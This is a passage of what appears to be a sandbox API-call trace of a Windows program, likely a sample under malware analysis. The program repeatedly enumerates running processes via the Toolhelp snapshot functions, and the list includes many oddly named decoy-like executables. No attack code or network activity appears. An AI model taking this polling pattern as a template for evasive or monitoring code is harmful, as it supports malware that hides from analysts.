Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.286] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.290] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.295] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0132.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0132.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0132.308] CloseHandle (hObject=0xbc) returned 1 [0132.308] Sleep (dwMilliseconds=0x12c) [0132.734] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0132.739] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.740] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0132.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0132.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0132.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0132.743] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0132.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0132.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0132.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0132.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0132.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.751] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0132.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0132.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0132.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0132.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0132.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0132.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0132.761] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0132.763] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0132.764] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0132.765] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0132.766] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0132.767] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0132.769] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0132.770] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0132.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0132.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0132.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0132.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0132.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0132.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0132.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0132.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0132.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0132.828] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0132.829] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0132.830] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 